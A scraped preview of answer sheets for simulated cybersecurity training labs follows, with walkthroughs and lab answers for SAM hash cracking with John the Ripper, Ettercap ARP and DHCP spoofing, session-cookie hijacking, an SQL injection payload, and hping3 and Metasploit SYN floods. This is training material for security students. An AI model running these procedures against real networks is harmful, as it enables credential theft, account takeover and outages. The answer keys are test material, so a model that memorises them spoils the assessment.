On IT-Laptop, crack the password using the
echo
and John the
Ripper commands.
“
Use the
cat
command to display the password hash file that was
copied to the thumb drive. Do NOT run the
echo
or John the Ripper
commands from the thumb drive.
”
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 8 minutes 23 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Use cat /media/root/ESD-USB/file_name.txt to display the password hashes contained in the
file
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Use the echo command to create a new hash file that contains the Admin's NTLM hash
Use John the Ripper to crack the password
Q1
What is the password found in the cracked SAM?
Explanation
In this lab, your task is to crack the SAM passwords as follows:
•
On Office 1, use
pwdump7
to export the contents of the SAM to SAMhash.txt.
•
Copy the exported file to the thumb drive and move the thumb drive to the IT-Laptop
computer.
•
On IT-Laptop, crack the password using the
echo
and John the Ripper commands.
Complete this lab as follows:
1.
Use pwdump7 to create a text file containing the SAM password hashes and copy the
new file to the thumb drive as follows:
a.
From the recovery dialog, select
Troubleshoot
.
b.
Select
Advanced options
.
c.
Select
Command Prompt
.
d.
Type
pwdump7 > SAMhash.txt
and press
Enter
.
e.
Type
copy SAMhash.txt g:
and press
Enter
.
2.
Move the thumb drive from Office 1 to the IT-Laptop computer as follows:
a.
From the top navigation tabs, select
Office 1
.
b.
Select the
USB Thumb Drive
plugged into the front of the computer.
c.
Drag the
USB Thumb Drive
to the Shelf so you can access it later in the IT
Administration office.
d.
From the top navigation tabs, select
Floor 1 Overview
.
e.
Under IT Administration, select
Hardware
.
f.
Above IT-Laptop, select
Back
to switch to the back view of the laptop.
g.
From the Shelf, drag the
USB Thumb Drive
to a USB port on the laptop
computer.
h.
Above IT-Laptop, select
Front
to switch to the front view of the laptop.
i.
On the monitor, select
Click to view Linux
.
3.
Create a new hash file that contains the hash to be cracked as follows:
a.
From the Favorites bar, open Terminal.
b.
Type
cat
/media/root/ESD-USB/SAMhash.txt
and press
Enter
.
c.
Type
echo
.
d.
Press the space bar.
e.
In the Admin line of the output, select the
hash
in the fourth field. Each field
is separated by a colon. This is the hash value that needs to be cracked.
f.
Right-click the
hash
in the fourth field of the Admin line.
Notice that the hash was pasted into the command line.
g.
Press the space bar.
h.
Type
> SAMhash.txt
.
i.
Press
Enter
.
4.
Use John the Ripper and the new hash file to crack the password as follows:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
a.
Type
john SAMhash.txt
and press
Enter
.
b.
From the output, find the
Admin's password
.
c.
In the top right, select
Answer Questions
.
d.
Answer the questions.
e.
Select
Score Lab
.
Lab Questions:
a.
What is the password found in the cracked SAM?
b.
P@55word!
QUESTION 8:
You are the IT security administrator for a small corporate network.
The HR director is concerned that an employee is doing something
sneaky on the company's employee portal and has authorized you to
hijack his web session so you can investigate.
In this lab, your task is to hijack a web session as follows:
•
On IT-Laptop, use Ettercap to sniff traffic between the
employee's computer in Office1 and the gateway.
•
Initiate a man-in-the-middle attack to capture the session ID for
the employee portal logon.
•
On Office1, log in to the employee portal on rmksupplies.com
using Chrome and the following credentials:
o
Username:
bjackson
o
Password:
$uper$ecret1
•
On IT-Laptop, copy the session ID detected in Ettercap.
•
On Office2, navigate to rmksupplies.com and use the cookie
editor plug-in in Chrome to inject the session ID cookie.
•
Verify that you hijacked the session.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Pass
Elapsed Time: 12 minutes 49 seconds
Required Score: 100%
Task Summary
Required Actions
Select the enp2s0 interface
Set Office1 as a target
Set the gateway as a target
Launch the MITM Arp poison attack with Sniff Remote Connections
Login to RMKSupplies on Office1
Hijack the session on Office2
Explanation
In this lab, your task is to hijack a web session as follows:
•
On IT-Laptop, use Ettercap to sniff traffic between the employee's computer in Office1
and the gateway.
•
Initiate a man-in-the-middle attack to capture the session ID for the employee portal
logon.
•
On Office1, log in to the employee portal on rmksupplies.com using the following
credentials:
o
Username:
bjackson
o
Password:
$uper$ecret1
•
On IT-Laptop, copy the session ID detected in Ettercap.
•
On Office2, navigate to rmksupplies.com and use the cookie editor plug-in in Chrome to
inject the session ID cookie.
•
Verify that you hijacked the session.
Complete this lab as follows:
1.
On IT-Laptop, open Terminal from the sidebar.
2.
At the prompt, type
host office1
and press
Enter
to get the IP address of Office1.
3.
Type
route
and press
Enter
to get the gateway address.
4.
Use Ettercap to sniff traffic between Office1 and the gateway as follows:
a.
From the Favorites bar, open Ettercap.
b.
Maximize the window for easier viewing.
c.
Select
Sniff
>
Unified sniffing
.
d.
From the Network Interface drop-down list, select
enp2s0
.
e.
Click
OK
.
f.
Select
Hosts
>
Scan for hosts
.
g.
Select
Hosts
>
Host list
.
We want to target information between Office1 (192.168.0.33) and the
gateway (192.168.0.5).
h.
Under IP Address, select
192.168.0.5
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
i.
Select
Add to Target 1
.
j.
Select
192.168.0.33
.
k.
Select
Add to Target 2
.
5.
Initiate a man-in-the-middle attack as follows:
a.
Select
Mitm
>
ARP poisoning
.
b.
Select
Sniff remote connections
.
c.
Click
OK
. You are ready to capture traffic.
6.
On Office1, log in to the employee portal on rmksupplies.com as follows:
a.
From the top navigation tabs, select
Floor 1 Overview
.
b.
Under Office 1, select
Office1
.
c.
From the taskbar, open Chrome.
d.
Maximize the window for easier viewing.
e.
In the URL field, enter
rmksupplies.com
.
f.
Press
Enter
.
g.
At the bottom of the page, select
Employee Portal
.
h.
In the Username field, enter
bjackson
.
i.
In the Password field, enter
$uper$ecret1
.
j.
Click
Login
.
You are logged into the portal as Blake Jackson.
7.
On IT-Laptop, copy the session ID detected in Ettercap as follows:
a.
From the top navigation tabs, select
Floor 1 Overview
.
b.
Under IT Administration, select
IT-Laptop
.
c.
In the Ettercap console, find bjackson's
username
,
password
, and
session
cookie
(.login) captured in Ettercap.
d.
Highlight the
session ID
.
e.
Press
Ctrl
+
C
to copy.
8.
On Office2, go to rmksupplies.com and use the cookie editor plug-in to inject the session
ID cookie as follows:
a.
From the top navigation tabs, select
Floor 1 Overview
.
b.
Under Office 2, select
Office2
.
c.
From the taskbar, open Chrome.
d.
Maximize the window for easier viewing.
e.
In Chrome's URL field, enter
rmksupplies.com
.
f.
Press
Enter
.
g.
In the top right corner, select
cookie
to open the cookie editor.
h.
At the top, select the plus
+
sign to add a new session cookie.
i.
In the Name field, enter
.login
j.
In the Value field, press
Ctrl
+
V
to paste in the session cookie you copied
from Ettercap.
k.
Make sure
rmksupplies.com
is in the Domain field.
l.
Select the
green check mark
to save the cookie.
m.
Click outside the cookie editor to close the editor.
9.
At the bottom of the rkmsupplies page, select
Employee Portal
.
You are now on Blake Jackson's web session.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 9:
You are a cybersecurity consultant. The company hiring you suspects
that employees are connecting to a rogue access point (AP). You
need to find the name of the hidden rogue AP so it can be
deauthorized. The computer suspected of using the rogue access
point is Exec-Laptop.
In this lab, your task is to complete the following:
•
On IT-Laptop, use
airmon-ng
to put the wireless adapter in
monitor mode.
•
Use
airodump-ng
to find the hidden access point.
•
On Exec-Laptop, connect to the rogue AP using the CoffeeShop
SSID.
•
Answer the question.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 4 minutes 5 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Set the the wlp1s0 wireless adapter to monitor mode
Find the hidden access point
Q1
What is the BSSID of the rogue access point?
Explanation
In this lab, your task is to complete the following:
•
On IT-Laptop, use
airmon-ng
to put the wireless adapter in monitor mode.
•
Use
airodump-ng
to find the hidden access point.
•
On Exec-Laptop, connect to the rogue AP using the CoffeeShop SSID.
•
Answer the question.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Complete this lab as follows:
1.
On IT-Laptop, configure the wlp1s0 card to run in monitor mode as follows:
a.
From the Favorites bar, open Terminal.
b.
At the prompt, type
airmon-ng
and press
Enter
to find the name of the
wireless adapter.
c.
Type
airmon-ng start wlp1s0
and press
Enter
to put the adapter in monitor
mode.
d.
Type
airmon-ng
and press
Enter
to view the new name of the wireless
adapter.
2.
Use airodump-ng to discover and isolate the hidden access point as follows:
a.
Type
airodump-ng wlp1s0mon
and press
Enter
to discover all of the access
points.
b.
Press
Ctrl
+
c
to stop airodump-ng.
c.
Find the hidden access point ESSID
<length : 0>
.
d.
In the top right, select
Answer Questions
.
e.
Answer the question.
f.
In Terminal, type
airodump-ng wlp1s0mon --bssid
bssid_number
and
press
Enter
to isolate the hidden access point.
3.
Switch to the Exec-Laptop and connect to the Wi-Fi network as follows:
a.
From the top navigation tabs, select
Floor 1 Overview
.
b.
Under Executive Office, select
Exec-Laptop
.
c.
From the notification area, select the
Wi-Fi network
icon.
d.
Select
Hidden Network
.
e.
Select
Connect
.
f.
In the Enter the name (SSID) for the network field, type
CoffeeShop
.
In a real environment, you'll only need to wait until the employee connects to
the rogue access point again.
g.
Select
Next
.
h.
Select
Yes
.
i.
Under Lab Questions, select
Score Lab
.
Lab Questions:
1.
What is the BSSID of the rogue access point?
a.
00:00:1B:11:22:33
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
A.2.3 Pro Domain 3: Attack
QUESTION 1:
You are the cybersecurity specialist for your company. You need to
check to see if any clear text passwords are being exposed to hackers
through an HTTP login request.
In this lab, your task is to analyze HTTP POST packets as follows:
•
Use Wireshark to capture all packets.
•
Filter the captured packets to show only HTTP POST data.
•
Examine the packets captured to find clear text passwords.
•
Answer the questions.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 2 minutes 15 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Filter the captured packets to show only HTTP POST data
Q1
How many HTTP POST packets were captured?
Q2
What is the source IP address of the packet containing the clear text password?
Q3
What is the clear text password captured?
Explanation
In this lab, your task is to analyze HTTP POST packets as follows:
•
Use Wireshark to capture all packets.
•
Filter the captured packets to show only HTTP POST data.
•
Examine the packets captured to find clear text passwords.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
•
Answer the questions.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
Select the
blue fin
to begin a Wireshark capture.
4.
Capture
packets
for five seconds.
5.
Select the
red box
to stop the Wireshark capture.
6.
Maximize Wireshark for easier viewing.
7.
In the Apply a display filter field, type
http.request.method==POST
and press
Enter
to
show the HTTP POST requests.
8.
From the middle pane, expand
HTML Form URL Encoded
for each packet.
9.
Examine the
information
shown to find clear text passwords.
10.
In the top right, select
Answer Questions
.
11.
Answer the questions.
12.
Select
Score Lab
.
Lab Questions:
1.
How many HTTP POST packets were captured?
a.
3
2.
What is the source IP address of the packets containing the clear text password?
a.
192.168.0.98
3.
What is the captured clear text password?
a.
St0ne$@
QUESTION 2:
You are the IT security administrator for a small corporate network.
You're experimenting with DHCP spoofing attacks using Ettercap.
In this lab, your task is to complete the following:
•
On IT-Laptop, use Ettercap to launch a man-in-the-middle DHCP
spoofing attack using the following parameters:
o
Netmask:
255.255.255.0
o
DNS Server IP:
192.168.0.11
•
On Support, complete the following tasks:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
o
Start a capture in Wireshark and filter the display for
DHCP traffic.
o
View the IP address and the gateway in Terminal.
o
Bring the network interface down and back up to
request a new DHCP address.
o
In Wireshark, how many DHCP packets were
exchanged?
o
View the IP address and gateway again. What has
changed?
•
On Office1, complete the following tasks:
o
Use tracert to rmksupplies.com to find the path. What is
the path?
o
Check the IP address of the computer.
o
Release and renew the IP address assigned by DHCP.
o
Check the IP address of the computer again. What has
changed?
o
Use tracert to rmksupplies.com to find the path again.
What has changed?
o
Log in to the rmksupplies.com employee portal with the
following credentials:
▪
Username:
bjackson
▪
Password:
$uper$ecret1
•
On IT-Laptop, find the captured username and password in
Ettercap.
•
Answer the questions.
Your Performance
Your Score: 5 of 5 (100%)
Pass Status:
Pass
Elapsed Time: 8 minutes 25 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
On IT-Laptop, launch a DHCP MITM attack using Ettercap
On Support:
Hide Details
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
View the DHCP traffic in Wireshark with the bootp filter
Refresh the network interface to get a new IP address from DHCP
Q1
How many DHCP packets were captured in Wireshark?
Q2
Which gateway addresses are provided in the ACK packets?
On Office1:
Hide Details
Use tracert to view the path to rmksupplies.com
Use ipconfig to release and renew the assigned IP address
Login to the rmksupplies.com Employee Portal
Explanation
In this lab, your task is to complete the following:
•
On IT-Laptop, use Ettercap to launch a man-in-the-middle DHCP spoofing attack using
the following parameters:
o
Netmask:
255.255.255.0
o
DNS Server IP:
192.168.0.11
•
On Support, complete the following tasks:
o
Start a capture in Wireshark and filter the display for DHCP traffic.
o
View the IP address and the gateway in Terminal.
o
Bring the network interface down and back up to request a new DHCP
address.
o
In Wireshark, how many DHCP packets were exchanged?
o
View the IP address and gateway again. What has changed?
•
On Office1, complete the following tasks:
o
Use tracert to rmksupplies.com to find the path. What is the path?
o
Check the IP address of the computer.
o
Release and renew the IP address assigned by DHCP.
o
Check the IP address of the computer again. What has changed?
o
Use tracert to rmksupplies.com to find the path again. What has changed?
o
Login to the rmksupplies.com Employee Portal with the following credentials:
▪
Username:
bjackson
▪
Password:
$uper$ecret1
•
On IT-Laptop, find the captured username and password in Ettercap.
•
Answer the questions
Complete this lab as follows:
1.
On IT-Laptop, start unified sniffing on the enp2s0 interface as follows:
a.
From the Favorites bar, select
Ettercap
.
b.
Select
Sniff
>
Unified sniffing
.
c.
From the Network Interface drop-down list, select
enp2s0
.
d.
Click
OK
.
e.
Select
Mitm
>
DHCP spoofing
.
f.
In the Netmask field, enter
255.255.255.0
.
g.
In the DNS Server IP field, enter
192.168.0.11
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
h.
Click
OK
.
2.
On Support, start a capture that filters for bootp packets as follows:
a.
From top navigation tabs, select
Floor 1 Overview
.
b.
Under Support Office, select
Support
.
c.
From the Favorites bar, open Wireshark.
d.
Under Capture, select
enp2s0
.
e.
Select the
blue fin
to begin a Wireshark capture.
f.
In the Apply a display filter field, type
bootp
and press
Enter
.
3.
Request a new IP address as follows:
a.
From the Favorites bar, open Terminal.
b.
At the prompt, type
ip addr show
and press
Enter
.
The IP address for enp2s0 is 192.168.0.45.
c.
Type
route
and press
Enter
.
The gateway is 192.168.0.5.
d.
Type
ip link set enp2s0 down
and press
Enter
.
e.
Type
ip link set enp2s0 up
and press
Enter
to bring the interface back up.
f.
Maximize Wireshark for easier viewing.
In Wireshark, under the Info column, notice that there are two DHCP ACK
packets. One is the real acknowledgment (ACK) packet from the DHCP server,
and the other is the spoofed ACK packet.
g.
Select the first
DHCP ACK packet
received.
h.
In the middle panel, expand
Bootstrap Protocol (ACK)
.
i.
Expand
Option: (3) Router
.
Notice the IP address for the router.
j.
Repeat steps 3g-3i for the second ACK packet.
k.
In the top right, select
Answer Questions
.
l.
Answer the questions.
m.
Minimize Wireshark.
4.
View the current IP addresses as follows:
a.
In Terminal at the prompt, type
ip addr show
and press
Enter
.
The IP address is 192.168.0.45.
b.
Type
route
and press
Enter
.
The current gateway is 192.168.0.46. This is the address of the computer
performing the man-in-the-middle attack.
5.
On Office1, view the current route and IP address as follows:
a.
From top navigation tabs, select
Floor 1 Overview
.
b.
Under Office 1, select
Office1
.
c.
Right-click
Start
and select
Windows PowerShell (Admin)
.
d.
Type
tracert rmksupplies.com
and press
Enter
.
Notice that the first hop is 192.168.0.5.
e.
Type
ipconfig /all
and press
Enter
to view the IP address configuration for
the computer.
The configuration for Office1 is as follows:
▪
IP address: 192.168.0.33
▪
Gateway: 192.168.0.5
▪
DHCP server: 192.168.0.14
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
f.
At the prompt, type
ipconfig /release
and press
Enter
to release the
currently assigned addresses.
g.
Type
ipconfig /renew
and press
Enter
to request a new IP address from the
DHCP server.
Notice that the default gateway has changed to the attacker's computer
which has an IP address of 192.168.0.46.
h.
Type
tracert rmksupplies.com
and press
Enter
.
Notice that the first hop is now 192.168.0.46 (the address of the attacker's
computer).
6.
In Google Chrome, log into the rmksupplies.com employee portal as follows:
a.
From the taskbar, open Google Chrome.
b.
Maximize the window for easier viewing.
c.
In the URL field, enter
rmksupplies.com
and press
Enter
.
d.
At the bottom of the page, select
Employee Portal
.
e.
In the Username field, enter
bjackson
.
f.
In the Password field, enter
$uper$ecret1
.
g.
Select
Login
. You are logged in as Blake Jackson.
7.
From IT-Laptop, find the captured username and password in Ettercap as follows:
a.
From top navigation tabs, select
Floor 1 Overview
.
b.
Under IT Administration, select
IT-Laptop
.
c.
Maximize Ettercap.
d.
In Ettercap's bottom pane, find the
username
and
password
used to log in to
the employee portal.
8.
In the top right, select
Answer Questions
to end the lab.
9.
Select
Score Lab
.
Lab Questions:
1.
How many DHCP packets were captured in Wireshark?
a.
5
2.
Which gateway addresses are provided in the ACK packets?
a.
192.168.0.5
b.
192.168.0.46
QUESTION 3:
CorpNet.xyz has hired you as a penetration testing consultant. While
visiting the company, you connected a small computer to the switch in
the Networking Closet. This computer also functions as a rogue
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
wireless access point. Now you are sitting in your van in the parking
lot of CorpNet.xyz, where you have connected to the internal network
through the rogue wireless access point. Using the small computer
you left behind, you can perform remote exploits against the company.
In this lab, your task is to complete the following:
•
On Consult-Lap2, use
ssh -X
to connect to your rogue computer
using the following parameters:
o
IP address:
192.168.0.251
o
Password:
$uper$neaky
•
Use Ettercap and the following parameters to launch a DHCP
spoofing man-in-the-middle attack on your rogue computer and
attempt to capture any unsecure passwords:
o
Network Interface:
enp2s0
o
Netmask:
255.255.255.0
o
DNS Server IP address:
192.168.0.11
•
On Exec, release and renew the IP address assigned by DHCP.
•
Log in to the rmksupplies.com employee portal using the
following credentials:
o
Username:
bjackson
o
Password:
$uper$ecret1
•
On Consult-Lap2, copy the session ID detected in Ettercap.
•
On Consult-Lap, go to rmksupplies.com and use the cookie
editor plug-in to inject the session ID cookie.
•
Verify that you have hijacked the session.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status:
Pass
Elapsed Time: 5 minutes 5 seconds
Required Score: 100%
Task Summary
Required Actions
Use ssh -X to connect to the remote computer
Launch an MITM attack
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
On Exec, release and renew the IP address
Inject the session ID into a cookie
Hijack the session
Login to the rmksupplies Employee Portal
Explanation
In this lab, your task is to complete the following:
•
On Consult-Lap2, use
ssh -X
to connect to your rogue computer using the following
paramenters:
o
IP address:
192.168.0.251
o
Password:
$uper$neaky
•
Use Ettercap and the following parameters to launch a DHCP spoofing man-in-the-
middle attack on your rogue computer and attempt to capture any unsecure passwords:
o
Network Interface:
enp2s0
o
Netmask:
255.255.255.0
o
DNS Server IP address:
192.168.0.11
•
On Exec, release and renew the IP address assigned by DHCP.
•
Log in to the rmksupplies.com employee portal using the following credentials:
o
Username:
bjackson
o
Password:
$uper$ecret1
•
On Consult-Lap2, copy the session ID detected in Ettercap.
•
On Consult-Lap, go to rmksupplies.com and use the cookie editor plug-in to inject the
session ID cookie.
•
Verify that you have hijacked the session.
Complete this lab as follows:
1.
From Conult-Lap2, connect to your rogue computer as follows:
a.
From the Favorites bar, open Terminal.
b.
At the prompt, type
ssh -X 192.168.0.251
and press
Enter
.
c.
For the password, type
$uper$neaky
and press
Enter
.
You are now connected to Rogue1.
2.
Use Ettercap to launch a DHCP spoofing man-in-the-middle attack as follows:
a.
At the prompt, type
ettercap
and press
Enter
to launch Ettercap remotely.
Ettercap is running on the remote computer, but you see the screen locally.
b.
Select
Sniff
.
c.
Select
Unified sniffing
.
d.
From the Network Interface drop-down list, select
enp2s0
.
e.
Click
OK
.
f.
Select
Mitm
.
g.
Select
DHCP spoofing
.
h.
In the Netmask field, enter
255.255.255.0
.
i.
In the DNS Server IP field, enter
192.168.0.11
.
j.
Click
OK
.
3.
On Exec, release and renew the IP address as follows:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
a.
From top navigation tabs, select
Buildings
.
b.
Under Building A, select
Floor 1
.
c.
Under Executive Office, select
Exec
.
d.
Right-click
Start
and select
Windows PowerShell (Admin)
.
e.
Type
ipconfig /release
and press
Enter
to release the currently assigned
addresses.
f.
Type
ipconfig /renew
and press
Enter
to request a new IP address from the
DHCP server.
4.
Log into the rmksupplies.com employee portal as follows:
a.
From the taskbar, open Chrome.
b.
Maximize the window for easier viewing.
c.
In the URL field, enter
rmksupplies.com
and press
Enter
.
d.
At the bottom of the page, select
Employee Portal
.
e.
In the Username field, enter
bjackson
.
f.
In the Password field, enter
$uper$ecret1
.
g.
Select
Login
.
You are logged in as Blake Jackson.
5.
On Consult-Lap2, copy the session ID detected in Ettercap as follows:
a.
From the top navigation tabs, select
Building A
.
b.
Under Red Cell, select
Consult-Lap2
.
c.
In the Ettercap console, find bjackson's
username
,
password
, and
session
cookie
(.login) captured in Ettercap.
d.
Highlight the
session ID
.
e.
Press
Ctrl
+
C
to copy.
6.
On Consult-Lap, go to rmksupplies.com and use the cookie editor plug-in to inject the
session ID cookie as follows:
a.
From the top navigation tabs, select
Building A
.
b.
Under Red Cell, select
Consult-Lap
.
c.
From the taskbar, open Chrome.
d.
Maximize the window for easier viewing.
e.
In Chrome's URL field, enter
rmksupplies.com
.
f.
Press
Enter
.
g.
In the top right corner, select
cookie
to open the cookie editor.
h.
At the top, select the plus
+
sign to add a new session cookie.
i.
In the Name field, enter
.login
j.
In the Value field, press
Ctrl
+
V
to paste in the session cookie you copied
from Ettercap.
k.
Make sure
rmksupplies.com
appears in the Domain field.
l.
Select the
green check mark
to save the cookie.
m.
Click outside the cookie editor to close the editor.
n.
At the bottom of the rkmsupplies page, select
Employee Portal
.
You are now on Blake Jackson's web session on your external computer.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 4:
You are the penetration tester for a small corporate network. You have
decided to see how secure your online bank's web page is.
In this lab, your task is to perform a simple SQL injection attack on
MySecureOnlineBank.com using the following information:
•
Make an account query for account number
90342
.
•
Perform a simple SQL attack using
0 OR 1=1
.
•
Answer the questions.
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 1 second
Required Score: 100%
Task Summary
Lab Questions
Q1
What is your account balance?
Q2
What is the account number of Nisha Dickson?
Explanation
In this lab, your task is to perform a simple SQL injection attack on MySecureOnlineBank.com using
the following information:
•
Make an account query for account number
90342
.
•
Perform a simple SQL attack using
0 OR 1=1
.
•
Answer the questions.
Complete this lab as follows:
1.
From the taskbar, open Chrome.
2.
Maximize the window for easier viewing.
3.
In the URL field, type
mysecureonlinebank.com
4.
Press
Enter
.
5.
In the Enter your Account Number field, enter
90342
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
6.
Select
Lookup
.
The account balance is $582.29.
7.
In the top right, select
Answer Questions
.
8.
Answer question 1.
9.
In the Enter your Account Number field, enter
0 OR 1=1
for the SQL injection.
10.
Select
Lookup
.
11.
Answer question 2.
12.
Select
Score Lab
.
Lab Questions:
1.
What is your account balance?
a.
$582.29
2.
What is Nisha Dickson’s account number
?
a.
90003
QUESTION 5:
You are the CorpNet IT administrator. Your support team says that
CorpNet's customers are unable to browse to the public-facing web
server. You suspect that it might be under some sort of denial-of-
service attack, possibly a TCP SYN flood attack. Your www_stage
computer is on the same network segment as your web server, so
you'll use this computer to investigate the problem.
In this lab, your task is to:
•
Capture packets from the network segment on www_stage using
Wireshark.
•
Analyze the attack using the following filters:
o
tcp.flags.syn==1 and tcp.flags.ack==1
o
tcp.flags.syn==1 and tcp.flags.ack==0
•
Answer the question.
Your Performance
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 2 minutes 44 seconds
Required Score: 100%
Task Summary
Lab Questions
Filter for SYN and ACK packets
Q1
What indicates that this is a distributed denial-of-service (DDoS) attack?
Explanation
In this lab, your task is to:
•
Capture packets from the network segment on www_stage using Wireshark.
•
Analyze the attack using the following filters:
o
tcp.flags.syn==1 and tcp.flags.ack==1
o
tcp.flags.syn==1 and tcp.flags.ack==0
•
Answer the question.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
From the menu, select the
blue fin
to begin the capture.
4.
In the Apply a display filter field, type
tcp.flags.syn==1 and tcp.flags.ack==1
and
press
Enter
to filter the Wireshark display to only those packets with both the SYN flag
and ACK flag.
You may have to wait several seconds before any SYN-ACK packets are captured and
displayed.
5.
Select the
red square
to stop the capture.
6.
In the Apply a display filter field, change the tcp.flags.ack ending from
1
to
0
and
press
Enter
to filter the Wireshark display to packets with only the SYN flag.
Notice that there are a flood of SYN packets being sent to 128.28.1.1 (www.corpnet.xyz)
that were not being acknowledged.
7.
In the top right, select
Answer Questions
.
8.
Answer the question.
9.
Select
Score Lab
.
Lab Questions:
1.
What indicates that this is a distributed denial-of-service (DDoS) attack?
a.
There are multiple source addresses for the SYN packets with the
destination address 128.28.1.1.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 6:
As the IT administrator for a small corporate network, you want to
know how to find and recognize a TCP SYN flood attack. You know
you can do this using the Wireshark packet analyzer and a Linux tool
named hping3.
In this lab, your task is to use Wireshark to capture and analyze TCP
SYN flood attacks as follows:
•
Filter captured packets to show TCP SYN packets for the
enp2s0 interface.
•
Use
hping3
to launch a SYN flood attack against
rmksupplies.com using Terminal.
•
Examine a SYN packet with the destination address of
208.33.42.28 after capturing packets for a few seconds.
•
Answer the question.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 2 minutes 38 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Filter SYN packets
Launch an hping3 flood
Q1
For the packet selected, what is the hex value for Flags?
Explanation
In this lab, your task is to use Wireshark to capture and analyze TCP SYN flood attacks as follows:
•
From Kali Linux, start a capture in Wireshark for the esp20 interface.
•
•
Use
hping3
to launch a SYN flood attack against rmksupplies.com using Terminal.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
•
Examine a SYN packet with the destination address of 208.33.42.28 after capturing
packets for a few seconds.
•
Answer the question.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
Select the
blue fin
to begin a Wireshark capture.
4.
In the Apply a display filter field, type
tcp.flags.syn==1
and press
Enter
.
5.
From the Favorites bar, open Terminal.
6.
At the prompt, type
hping3 --syn --flood rmksupplies.com
and press
Enter
to start a
TCP SYN flood against the CorpDC domain controller.
7.
After a few seconds of capturing packets, select the
red box
to stop the Wireshark
capture
8.
In the top pane of Wireshark, select one of the
packets
captured with a destination
address of 208.33.42.28.
9.
In the middle pane of Wireshark, expand
Transmission Control Protocol
.
10.
Scroll down to Flags.
Notice that both Flags in this pane and the Info column in the top pane show this as a
SYN packet.
11.
In the top right, select
Answer Questions
.
12.
Answer the question.
13.
Click
Score Lab
.
Lab Questions:
1.
For the packet selected, what is the hex value for Flags?
a.
0x002
QUESTION 7:
As the IT security administrator for a small corporate network, you
need to simulate a SYN flood attack using Metasploit so you can
complete a penetration test.
In this lab, your task is to perform and monitor a SYN flood attack
using the following information:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
•
Use Zenmap to find the FTP port on CorpServer (192.168.0.10).
•
Use Metasploit to send a SYN flood attack as follows:
o
Remote host:
192.168.0.10
o
Source host:
192.168.0.33
o
Set the FTP port to match the FTP port used by
CorpServer.
•
Use Wireshark to capture the SYN flood on the enp2s0 network
interface.
•
Filter to show only TCP SYN packets.
•
Find the MAC address of the computer causing the SYN flood.
•
Answer the questions.
Your Performance
Your Score: 5 of 5 (100%)
Pass Status:
Pass
Elapsed Time: 4 minutes 2 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Use Zenmap/nmap to scan ports
Started syn flood using Metasploit
Filtered for SYN attach using Wireshark
Q1
What is the source IP address of the SYN flood attack?
Q2
Which of the following MAC addresses is initiating the SYN flood attack?
Explanation
In this lab, your task is to perform and monitor a SYN flood attack using the following information:
•
Use Zenmap to find the FTP port on CorpServer (192.168.0.10).
•
